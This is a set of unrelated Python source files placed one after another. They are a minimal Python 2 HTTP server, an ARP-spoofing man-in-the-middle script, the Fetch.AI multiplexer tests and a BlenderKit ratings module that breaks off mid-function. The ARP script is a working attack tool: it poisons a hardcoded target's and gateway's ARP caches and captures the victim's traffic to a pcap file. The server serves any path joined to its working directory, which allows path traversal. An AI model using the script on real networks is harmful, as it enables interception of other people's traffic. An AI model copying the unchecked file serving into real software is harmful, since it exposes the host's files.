| source | python |
|---|---|
server.py
|
import socket, threading, os
from urlparse import urlparse, parse_qs
import handler
HOST = '' # Symbolic name meaning all available interfaces
PORT = 8080 # Arbitrary non-privileged port
STATIC_PATH = "./"
urlMapper = dict()
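# urlMapper maps URL paths to handler callables; handler.register() below is
# expected to populate it before requests arrive. Note: this file is written
# for Python 2 (print statements, the urlparse module).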
def getType(path):
if path.endswith('.js'):
return 'application/javascript'
elif path.endswith('.html'):
return 'text/html'
elif path.endswith('.css'):
return 'text/css'
elif path.endswith('.jpeg'):
return 'image/jpeg'
elif path.endswith('.jpg'):
return 'image/jpeg'
elif path.endswith('.png'):
return 'image/png'
elif path.endswith('.gif'):
return 'image/gif'
elif path.endswith('.ttf'):
return 'application/x-font-ttf'
elif path.endswith('.woff'):
return 'application/font-woff'
elif path.endswith('.woff2'):
return 'application/font-woff2'
else:
return 'text/html'
def response(conn, status, content, res_type):
    if status == 200:
        res = 'HTTP/1.0 200 OK\r\nContent-Type: ' + res_type + '\r\n\r\n' + content
    else:
        res = 'HTTP/1.0 404 Not Found\r\nContent-Type: text/html\r\n\r\n<h1>404 Not Found</h1>'
    conn.sendall(res)
    conn.close()
def staticRes(path):
    res = os.path.join(os.getcwd(), path[1:])
    exists = os.path.exists(res)
    print res, exists
    if exists:
        option = "rb"
        if getType(path).startswith("text"):
            option = "r"
        with open(res, option) as f:  # close the file once it has been read
            content = f.read()
        return (True, content)
    return (False, None)
def router(conn, verb, path, query):
    parsedObj = urlparse(path)
    path = parsedObj.path
    queryFromUrl = parsedObj.query
    if path == "/":
        path = "/index.html"
    # parenthesised: 'or' binds looser than 'and', so the original check
    # treated every lowercase 'get' as carrying a query string
    if (verb == 'get' or verb == 'GET') and queryFromUrl != '':
        query = queryFromUrl
res_type = getType(path)
if path in urlMapper:
func = urlMapper[path]
qs = parse_qs(query)
content = func(verb, path, qs)
response(conn, 200, content, res_type)
else:
(exists, content) = staticRes(path)
if exists:
response(conn, 200, content, res_type)
else:
response(conn, 404, None, res_type)
def serve(conn):
data = conn.recv(4096)
split_data = data.split("\r\n")
print split_data
    if not split_data or not split_data[0]:
        return
    reqLine = split_data[0].split()
    if len(reqLine) < 3:
        # malformed request line; nothing sensible to route
        return
    verb = reqLine[0]
    path = reqLine[1]
    protocol = reqLine[2]
    query = split_data[-1]  # for POSTs, the form body follows the blank line
router(conn, verb, path, query)
def webServer():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
handler.register(urlMapper)
while True:
conn, addr = s.accept()
print 'Connected by', addr
t = threading.Thread(target = serve, args = (conn,))
t.start()
s.close()
webServer()
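# For reference, a minimal companion handler.py could look like the sketch
# below (an assumption -- only register(mapper) and the handler signature
# (verb, path, qs) -> body are implied by the server code above):
#
#   def hello(verb, path, qs):
#       name = qs.get('name', ['world'])[0]
#       return '<h1>Hello, %s!</h1>' % name
#
#   def register(mapper):
#       mapper['/hello'] = hello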
|
ARP_Spoof.py
|
#!/usr/bin/python
from scapy.all import *
import sys
import threading
import time
interface = "eth1"
target = "192.168.108.49"
gateway = "192.168.108.1"
packets = 1000
conf.iface = interface
conf.verb = 0
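# Attack flow: resolve both victims' MAC addresses, then repeatedly send forged
# ARP replies (op=2, "is-at") so the target maps the gateway IP to our MAC and
# the gateway maps the target IP to our MAC. With IP forwarding enabled on this
# host, their traffic then transits this machine, where it is sniffed to a pcap
# before the genuine mappings are restored.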
def restore(gateway, gwmac_addr, target, targetmac_addr):
print "\nRestoring normal ARP mappings."
send(ARP(op = 2, psrc = gateway, pdst = target, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gwmac_addr), count = 5)
send(ARP(op = 2, psrc = target, pdst = gateway, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = targetmac_addr), count = 5)
sys.exit(0)
def macgrab(ip_addr):
responses, unanswered = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = ip_addr), timeout = 2, retry = 10)
for s,r in responses:
return r[Ether].src
return None
def poison_target(gateway, gwmac_addr, target, targetmac_addr):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway
poison_target.pdst = target
poison_target.hwdst = targetmac_addr
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target
poison_gateway.pdst = gateway
poison_gateway.hwdst = gwmac_addr
print "\nMitM ARP attack started."
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore(gateway, gwmac_addr, target, targetmac_addr)
return
gwmac_addr = macgrab(gateway)
targetmac_addr = macgrab(target)
if gwmac_addr is None:
print "\nUnable to retrieve gateway MAC address. Are you connected?"
sys.exit(0)
else:
print "\nGateway IP address: %s\nGateway MAC address: %s\n" % (gateway, gwmac_addr)
if targetmac_addr is None:
print "\nUnable to retrieve target MAC address. Are you connected?"
sys.exit(0)
else:
print "\nTarget IP address: %s\nTarget MAC address: %s\n" % (target, targetmac_addr)
mitm_thread = threading.Thread(target = poison_target, args = (gateway, gwmac_addr, target, targetmac_addr))
mitm_thread.start()
try:
print "\nMitM sniffing started. Total packets to be sniffed: %d" % packets
bpf = "ip host %s" % target
cap_packets = sniff(count=packets, filter=bpf, iface=interface)
wrpcap('arpMITMresults.pcap', cap_packets)
restore(gateway, gwmac_addr, target, targetmac_addr)
except KeyboardInterrupt:
restore(gateway, gwmac_addr, target, targetmac_addr)
sys.exit(0)
|
test_multiplexer.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests for the Multiplexer."""
import asyncio
import logging
import os
import shutil
import sys
import tempfile
import time
import unittest.mock
from pathlib import Path
from threading import Thread
from unittest import mock
from unittest.mock import MagicMock, call, patch
import pytest
from pexpect.exceptions import EOF # type: ignore
import aea
from aea.cli.core import cli
from aea.configurations.base import PublicId
from aea.configurations.constants import DEFAULT_LEDGER
from aea.connections.base import ConnectionStates
from aea.exceptions import AEAEnforceError
from aea.helpers.exception_policy import ExceptionPolicyEnum
from aea.identity.base import Identity
from aea.mail.base import AEAConnectionError, Envelope, EnvelopeContext
from aea.multiplexer import AsyncMultiplexer, InBox, Multiplexer, OutBox
from aea.test_tools.click_testing import CliRunner
from packages.fetchai.connections.local.connection import LocalNode
from packages.fetchai.connections.p2p_libp2p.connection import (
PUBLIC_ID as P2P_PUBLIC_ID,
)
from packages.fetchai.protocols.default.message import DefaultMessage
from .conftest import (
AUTHOR,
CLI_LOG_OPTION,
ROOT_DIR,
UNKNOWN_CONNECTION_PUBLIC_ID,
UNKNOWN_PROTOCOL_PUBLIC_ID,
_make_dummy_connection,
_make_local_connection,
_make_stub_connection,
logger,
)
from tests.common.pexpect_popen import PexpectWrapper
from tests.common.utils import wait_for_condition
@pytest.mark.asyncio
async def test_receiving_loop_terminated():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug:
multiplexer.connection_status.set(ConnectionStates.disconnected)
await multiplexer._receiving_loop()
mock_logger_debug.assert_called_with("Receiving loop terminated.")
multiplexer.connection_status.set(ConnectionStates.connected)
multiplexer.disconnect()
def test_connect_twice():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.disconnect()
def test_disconnect_twice():
"""Test that connecting twice the multiplexer behaves correctly."""
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.disconnect()
multiplexer.disconnect()
def test_connect_twice_with_loop():
"""Test that connecting twice the multiplexer behaves correctly."""
running_loop = asyncio.new_event_loop()
thread_loop = Thread(target=running_loop.run_forever)
thread_loop.start()
try:
multiplexer = Multiplexer([_make_dummy_connection()], loop=running_loop)
with unittest.mock.patch.object(
multiplexer.logger, "debug"
) as mock_logger_debug:
assert not multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
multiplexer.connect()
assert multiplexer.connection_status.is_connected
mock_logger_debug.assert_called_with("Multiplexer already connected.")
multiplexer.disconnect()
running_loop.call_soon_threadsafe(running_loop.stop)
finally:
thread_loop.join()
@pytest.mark.asyncio
async def test_connect_twice_a_single_connection():
"""Test that connecting twice a single connection behaves correctly."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
assert not multiplexer.connection_status.is_connected
await multiplexer._connect_one(connection.connection_id)
with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug:
await multiplexer._connect_one(connection.connection_id)
mock_logger_debug.assert_called_with(
"Connection fetchai/dummy:0.1.0 already established."
)
await multiplexer._disconnect_one(connection.connection_id)
@pytest.mark.asyncio
async def test_run_bad_connect():
    """Test that `run` raises an error when the multiplexer is not connected properly."""
connection = _make_dummy_connection()
multiplexer = AsyncMultiplexer([connection])
f = asyncio.Future()
f.set_result(None)
with unittest.mock.patch.object(multiplexer, "connect", return_value=f):
with pytest.raises(ValueError, match="Multiplexer is not connected properly."):
await multiplexer.run()
def test_multiplexer_connect_all_raises_error():
"""Test the case when the multiplexer raises an exception while connecting."""
multiplexer = Multiplexer([_make_dummy_connection()])
with unittest.mock.patch.object(multiplexer, "_connect_all", side_effect=Exception):
with pytest.raises(
AEAConnectionError, match="Failed to connect the multiplexer."
):
multiplexer.connect()
multiplexer.disconnect()
def test_multiplexer_connect_one_raises_error_many_connections():
"""Test the case when the multiplexer raises an exception while attempting the connection of one connection."""
node = LocalNode()
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
multiplexer = Multiplexer([connection_1, connection_2, connection_3])
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
with unittest.mock.patch.object(connection_3, "connect", side_effect=Exception):
with pytest.raises(
AEAConnectionError, match="Failed to connect the multiplexer."
):
multiplexer.connect()
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
multiplexer.disconnect()
try:
shutil.rmtree(tmpdir)
except OSError as e:
logger.warning("Couldn't delete {}".format(tmpdir))
logger.exception(e)
@pytest.mark.asyncio
async def test_disconnect_twice_a_single_connection():
"""Test that connecting twice a single connection behaves correctly."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([_make_dummy_connection()])
assert not multiplexer.connection_status.is_connected
with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug:
await multiplexer._disconnect_one(connection.connection_id)
mock_logger_debug.assert_called_with(
"Connection fetchai/dummy:0.1.0 already disconnected."
)
def test_multiplexer_disconnect_all_raises_error():
"""Test the case when the multiplexer raises an exception while disconnecting."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
assert multiplexer.connection_status.is_connected
with unittest.mock.patch.object(
multiplexer, "_disconnect_all", side_effect=Exception
):
with pytest.raises(
AEAConnectionError, match="Failed to disconnect the multiplexer."
):
multiplexer.disconnect()
    # do the real disconnection to clean the test up
assert multiplexer.connection_status.is_disconnecting
multiplexer.disconnect()
assert multiplexer.connection_status.is_disconnected
@pytest.mark.asyncio
async def test_multiplexer_disconnect_one_raises_error_many_connections():
"""Test the case when the multiplexer raises an exception while attempting the disconnection of one connection."""
with LocalNode() as node:
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
multiplexer = Multiplexer([connection_1, connection_2, connection_3])
assert not connection_1.is_connected
assert not connection_2.is_connected
assert not connection_3.is_connected
multiplexer.connect()
assert connection_1.is_connected
assert connection_2.is_connected
assert connection_3.is_connected
with unittest.mock.patch.object(
connection_3, "disconnect", side_effect=Exception
):
with pytest.raises(
AEAConnectionError, match="Failed to disconnect the multiplexer."
):
multiplexer.disconnect()
assert not connection_1.is_connected
assert not connection_2.is_connected
assert connection_3.is_connected
# clean the test up.
await connection_3.disconnect()
multiplexer.disconnect()
try:
shutil.rmtree(tmpdir)
except OSError as e:
logger.warning("Couldn't delete {}".format(tmpdir))
logger.exception(e)
@pytest.mark.asyncio
async def test_sending_loop_does_not_start_if_multiplexer_not_connected():
"""Test that the sending loop is stopped does not start if the multiplexer is not connected."""
multiplexer = Multiplexer([_make_dummy_connection()])
with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug:
await multiplexer._send_loop()
mock_logger_debug.assert_called_with(
"Sending loop not started. The multiplexer is not connected."
)
@pytest.mark.asyncio
async def test_sending_loop_cancelled():
"""Test the case when the sending loop is cancelled."""
multiplexer = Multiplexer([_make_dummy_connection()])
multiplexer.connect()
await asyncio.sleep(0.1)
with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug:
multiplexer.disconnect()
mock_logger_debug.assert_any_call("Sending loop cancelled.")
@pytest.mark.asyncio
async def test_receiving_loop_raises_exception():
"""Test the case when an error occurs when a receive is started."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
with unittest.mock.patch("asyncio.wait", side_effect=Exception("a weird error.")):
with unittest.mock.patch.object(
multiplexer.logger, "error"
) as mock_logger_error:
multiplexer.connect()
time.sleep(0.1)
mock_logger_error.assert_called_with(
"Error in the receiving loop: a weird error.", exc_info=True
)
multiplexer.disconnect()
@pytest.mark.asyncio
async def test_send_envelope_with_non_registered_connection():
"""Test that sending an envelope with an unregistered connection raises an exception."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
multiplexer.connect()
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(connection_id=UNKNOWN_CONNECTION_PUBLIC_ID),
)
with pytest.raises(AEAConnectionError, match="No connection registered with id:.*"):
await multiplexer._send(envelope)
multiplexer.disconnect()
def test_send_envelope_error_is_logged_by_send_loop():
"""Test that the AEAConnectionError in the '_send' method is logged by the '_send_loop'."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
multiplexer.connect()
fake_connection_id = UNKNOWN_CONNECTION_PUBLIC_ID
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(connection_id=fake_connection_id),
)
with unittest.mock.patch.object(multiplexer.logger, "error") as mock_logger_error:
multiplexer.put(envelope)
time.sleep(0.1)
mock_logger_error.assert_called_with(
"No connection registered with id: {}.".format(fake_connection_id)
)
multiplexer.disconnect()
def test_get_from_multiplexer_when_empty():
"""Test that getting an envelope from the multiplexer when the input queue is empty raises an exception."""
connection = _make_dummy_connection()
multiplexer = Multiplexer([connection])
with pytest.raises(aea.mail.base.Empty):
multiplexer.get()
def test_send_message_no_supported_protocol():
"""Test the case when we send an envelope with a specific connection that does not support the protocol."""
with LocalNode() as node:
identity_1 = Identity("", address="address_1")
public_id = PublicId.from_str("fetchai/my_private_protocol:0.1.0")
connection_1 = _make_local_connection(
identity_1.address,
node,
restricted_to_protocols={public_id},
excluded_protocols={public_id},
)
multiplexer = Multiplexer([connection_1])
multiplexer.connect()
with mock.patch.object(multiplexer.logger, "warning") as mock_logger_warning:
protocol_id = UNKNOWN_PROTOCOL_PUBLIC_ID
envelope = Envelope(
to=identity_1.address,
sender=identity_1.address,
protocol_id=protocol_id,
message=b"some bytes",
)
multiplexer.put(envelope)
time.sleep(0.5)
mock_logger_warning.assert_called_with(
"Connection {} cannot handle protocol {}. Cannot send the envelope.".format(
connection_1.connection_id, protocol_id
)
)
multiplexer.disconnect()
def test_autoset_default_connection():
"""Set default connection automatically."""
connection_1 = _make_dummy_connection()
connection_2 = _make_dummy_connection()
connections = [connection_1, connection_2]
multiplexer = Multiplexer(connections)
multiplexer._default_connection = None
multiplexer._set_default_connection_if_none()
assert multiplexer._default_connection == connections[0]
@pytest.mark.asyncio
async def test_disconnect_when_not_connected():
"""Test disconnect when not connected."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections)
with patch.object(multiplexer, "_disconnect_all") as disconnect_all_mocked:
await multiplexer.disconnect()
disconnect_all_mocked.assert_not_called()
@pytest.mark.asyncio
async def test_exit_on_none_envelope():
"""Test sending task exit on None envelope."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
try:
await multiplexer.connect()
assert multiplexer.is_connected
multiplexer.put(None)
await asyncio.sleep(0.5)
assert multiplexer._send_loop_task.done()
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_inbox_outbox():
"""Test InBox OutBox objects."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",)
msg.to = "to"
msg.sender = "sender"
context = EnvelopeContext(connection_id=connection_1.connection_id)
envelope = Envelope(
to="to",
sender="sender",
protocol_id=msg.protocol_id,
message=msg,
context=context,
)
try:
await multiplexer.connect()
inbox = InBox(multiplexer)
outbox = OutBox(multiplexer)
assert inbox.empty()
assert outbox.empty()
outbox.put(envelope)
received = await inbox.async_get()
assert received == envelope
assert inbox.empty()
assert outbox.empty()
outbox.put_message(msg, context=context)
await inbox.async_wait()
received = inbox.get_nowait()
assert received == envelope
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_threaded_mode():
"""Test InBox OutBox objects in threaded mode."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, threaded=True)
msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",)
msg.to = "to"
msg.sender = "sender"
context = EnvelopeContext(connection_id=connection_1.connection_id)
envelope = Envelope(
to="to",
sender="sender",
protocol_id=msg.protocol_id,
message=msg,
context=context,
)
try:
multiplexer.start()
await asyncio.sleep(0.5)
inbox = InBox(multiplexer)
outbox = OutBox(multiplexer)
assert inbox.empty()
assert outbox.empty()
outbox.put(envelope)
received = await inbox.async_get()
assert received == envelope
assert inbox.empty()
assert outbox.empty()
outbox.put_message(msg, context=context)
await inbox.async_wait()
received = inbox.get_nowait()
assert received == envelope
finally:
multiplexer.stop()
@pytest.mark.asyncio
async def test_outbox_negative():
"""Test InBox OutBox objects."""
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",)
context = EnvelopeContext(connection_id=connection_1.connection_id)
envelope = Envelope(
to="to",
sender="sender",
protocol_id=msg.protocol_id,
message=b"",
context=context,
)
try:
await multiplexer.connect()
outbox = OutBox(multiplexer)
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put(envelope)
assert (
str(execinfo.value)
== "Only Message type allowed in envelope message field when putting into outbox."
)
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put_message("")
assert str(execinfo.value) == "Provided message not of type Message."
assert outbox.empty()
with pytest.raises(ValueError) as execinfo:
outbox.put_message(msg)
assert str(execinfo.value) == "Provided message has message.to not set."
assert outbox.empty()
msg.to = "to"
with pytest.raises(ValueError) as execinfo:
outbox.put_message(msg)
assert str(execinfo.value) == "Provided message has message.sender not set."
finally:
await multiplexer.disconnect()
@pytest.mark.asyncio
async def test_default_route_applied(caplog):
"""Test default route is selected automatically."""
logger = logging.getLogger("aea.multiplexer")
with caplog.at_level(logging.DEBUG, logger="aea.multiplexer"):
connection_1 = _make_dummy_connection()
connections = [connection_1]
multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop())
multiplexer.logger = logger
envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(),
)
multiplexer.default_routing = {
DefaultMessage.protocol_id: connection_1.connection_id
}
try:
await multiplexer.connect()
inbox = InBox(multiplexer)
outbox = InBox(multiplexer)
assert inbox.empty()
assert outbox.empty()
multiplexer.put(envelope)
await outbox.async_get()
finally:
await multiplexer.disconnect()
assert "Using default routing:" in caplog.text
def test_multiplexer_setup():
"""Test multiplexer setup to set connections."""
node = LocalNode()
tmpdir = Path(tempfile.mkdtemp())
d = tmpdir / "test_stub"
d.mkdir(parents=True)
input_file_path = d / "input_file.csv"
output_file_path = d / "input_file.csv"
connection_1 = _make_local_connection("my_addr", node)
connection_2 = _make_stub_connection(input_file_path, output_file_path)
connection_3 = _make_dummy_connection()
connections = [connection_1, connection_2, connection_3]
multiplexer = Multiplexer([])
with pytest.raises(AEAEnforceError):
multiplexer._connection_consistency_checks()
multiplexer.setup(connections, default_routing=None)
multiplexer._connection_consistency_checks()
class TestExceptionHandlingOnConnectionSend:
"""Test exception handling policy on connection.send."""
def setup(self):
"""Set up test case."""
self.connection = _make_dummy_connection()
self.multiplexer = Multiplexer([self.connection])
self.multiplexer.connect()
self.envelope = Envelope(
to="",
sender="",
protocol_id=DefaultMessage.protocol_id,
message=b"",
context=EnvelopeContext(connection_id=self.connection.connection_id),
)
self.exception = ValueError("expected")
def teardown(self):
"""Tear down test case."""
self.multiplexer.disconnect()
def test_log_policy(self):
"""Test just log exception."""
with patch.object(self.connection, "send", side_effect=self.exception):
self.multiplexer._exception_policy = ExceptionPolicyEnum.just_log
self.multiplexer.put(self.envelope)
time.sleep(1)
assert not self.multiplexer._send_loop_task.done()
def test_propagate_policy(self):
"""Test propagate exception."""
assert self.multiplexer._exception_policy == ExceptionPolicyEnum.propagate
with patch.object(self.connection, "send", side_effect=self.exception):
self.multiplexer.put(self.envelope)
time.sleep(1)
wait_for_condition(
lambda: self.multiplexer._send_loop_task.done(), timeout=5
)
assert self.multiplexer._send_loop_task.exception() == self.exception
def test_stop_policy(self):
"""Test stop multiplexer on exception."""
with patch.object(self.connection, "send", side_effect=self.exception):
self.multiplexer._exception_policy = ExceptionPolicyEnum.stop_and_exit
self.multiplexer.put(self.envelope)
time.sleep(1)
wait_for_condition(
lambda: self.multiplexer.connection_status.is_disconnected, timeout=5
)
def test_disconnect_order(self):
"""Test disconnect order: tasks first, disconnect_all next."""
parent = MagicMock()
async def fn():
return
with patch.object(
self.multiplexer, "_stop_receive_send_loops", return_value=fn()
) as stop_loops, patch.object(
self.multiplexer, "_disconnect_all", return_value=fn()
) as disconnect_all, patch.object(
self.multiplexer, "_check_and_set_disconnected_state"
) as check_and_set_disconnected_state:
parent.attach_mock(stop_loops, "stop_loops")
parent.attach_mock(disconnect_all, "disconnect_all")
parent.attach_mock(
check_and_set_disconnected_state, "check_and_set_disconnected_state"
)
self.multiplexer.disconnect()
assert parent.mock_calls == [
call.stop_loops(),
call.disconnect_all(),
call.check_and_set_disconnected_state(),
]
class TestMultiplexerDisconnectsOnTermination: # pylint: disable=attribute-defined-outside-init
"""Test multiplexer disconnects on agent process keyboard interrupted."""
def setup(self):
"""Set the test up."""
self.proc = None
self.runner = CliRunner()
self.agent_name = "myagent"
self.cwd = os.getcwd()
self.t = tempfile.mkdtemp()
shutil.copytree(Path(ROOT_DIR, "packages"), Path(self.t, "packages"))
os.chdir(self.t)
self.key_path = os.path.join(self.t, "fetchai_private_key.txt")
self.conn_key_path = os.path.join(self.t, "conn_private_key.txt")
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "init", "--local", "--author", AUTHOR]
)
assert result.exit_code == 0
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "create", "--local", self.agent_name]
)
assert result.exit_code == 0
os.chdir(Path(self.t, self.agent_name))
def test_multiplexer_disconnected_on_early_interruption(self):
"""Test multiplexer disconnected properly on termination before connected."""
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "add", "--local", "connection", str(P2P_PUBLIC_ID)]
)
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "build"])
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "generate-key", DEFAULT_LEDGER, self.key_path]
)
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "add-key", DEFAULT_LEDGER, self.key_path]
)
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(
cli, [*CLI_LOG_OPTION, "generate-key", DEFAULT_LEDGER, self.conn_key_path]
)
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(
cli,
[
*CLI_LOG_OPTION,
"add-key",
DEFAULT_LEDGER,
self.conn_key_path,
"--connection",
],
)
assert result.exit_code == 0, result.stdout_bytes
result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "issue-certificates"])
assert result.exit_code == 0, result.stdout_bytes
self.proc = PexpectWrapper( # nosec
[sys.executable, "-m", "aea.cli", "-v", "DEBUG", "run"],
env=os.environ,
maxread=10000,
encoding="utf-8",
logfile=sys.stdout,
)
self.proc.expect_all(
["Starting libp2p node..."], timeout=50,
)
self.proc.control_c()
self.proc.expect_all(
["Multiplexer .*disconnected."], timeout=20, strict=False,
)
self.proc.expect_all(
[EOF], timeout=20,
)
def test_multiplexer_disconnected_on_termination_after_connected(self):
"""Test multiplexer disconnected properly on termination after connected."""
self.proc = PexpectWrapper( # nosec
[sys.executable, "-m", "aea.cli", "-v", "DEBUG", "run"],
env=os.environ,
maxread=10000,
encoding="utf-8",
logfile=sys.stdout,
)
self.proc.expect_all(
["Start processing messages..."], timeout=20,
)
self.proc.control_c()
self.proc.expect_all(
["Multiplexer disconnecting...", "Multiplexer disconnected.", EOF],
timeout=20,
)
def teardown(self):
"""Tear the test down."""
if self.proc:
self.proc.wait_to_complete(10)
os.chdir(self.cwd)
try:
shutil.rmtree(self.t)
except (OSError, IOError):
pass
def test_multiplexer_setup_replaces_connections():
"""Test proper connections reset on setup call."""
m = AsyncMultiplexer([MagicMock(), MagicMock(), MagicMock()])
assert len(m._id_to_connection) == 3
assert len(m._connections) == 3
m.setup([MagicMock()], MagicMock())
assert len(m._id_to_connection) == 1
assert len(m._connections) == 1
|
ratings.py
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
if "bpy" in locals():
from importlib import reload
paths = reload(paths)
utils = reload(utils)
rerequests = reload(rerequests)
tasks_queue = reload(tasks_queue)
else:
from blenderkit import paths, utils, rerequests, tasks_queue
import bpy
import requests, threading
from bpy.props import (
IntProperty,
FloatProperty,
StringProperty,
EnumProperty,
BoolProperty,
PointerProperty,
)
from bpy.types import (
Operator,
Panel,
)
def pretty_print_POST(req):
"""
pretty print a request
"""
print('{}\n{}\n{}\n\n{}'.format(
'-----------START-----------',
req.method + ' ' + req.url,
'\n'.join('{}: {}'.format(k, v) for k, v in req.headers.items()),
req.body,
))
def upload_rating_thread(url, ratings, headers):
''' Upload rating thread function / disconnected from blender data.'''
utils.p('upload rating', url, ratings)
for rating_name, score in ratings:
if (score != -1 and score != 0):
rating_url = url + rating_name + '/'
data = {
"score": score, # todo this kind of mixing is too much. Should have 2 bkit structures, upload, use
}
try:
r = rerequests.put(rating_url, data=data, verify=True, headers=headers)
except requests.exceptions.RequestException as e:
print('ratings upload failed: %s' % str(e))
def send_rating_to_thread_quality(url, ratings, headers):
    '''Sends rating into a thread; main purpose is for tasks_queue.
    One function per property to avoid lost data due to stashing.'''
thread = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
thread.start()
def send_rating_to_thread_work_hours(url, ratings, headers):
    '''Sends rating into a thread; main purpose is for tasks_queue.
    One function per property to avoid lost data due to stashing.'''
thread = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
thread.start()
def upload_review_thread(url, reviews, headers):
    try:
        r = rerequests.put(url, data=reviews, verify=True, headers=headers)
    except requests.exceptions.RequestException as e:
        print('reviews upload failed: %s' % str(e))
def get_rating(asset_id):
    # this function isn't used anywhere, should probably get removed.
    user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
    api_key = user_preferences.api_key
    headers = utils.get_headers(api_key)
    rl = paths.get_api_url() + 'assets/' + asset_id + '/rating/'
    rtypes = ['quality', 'working_hours']
    for rt in rtypes:
        params = {
            'rating_type': rt
        }
        r = rerequests.get(rl, params=params, verify=True, headers=headers)
        print(r.text)
def update_ratings_quality(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
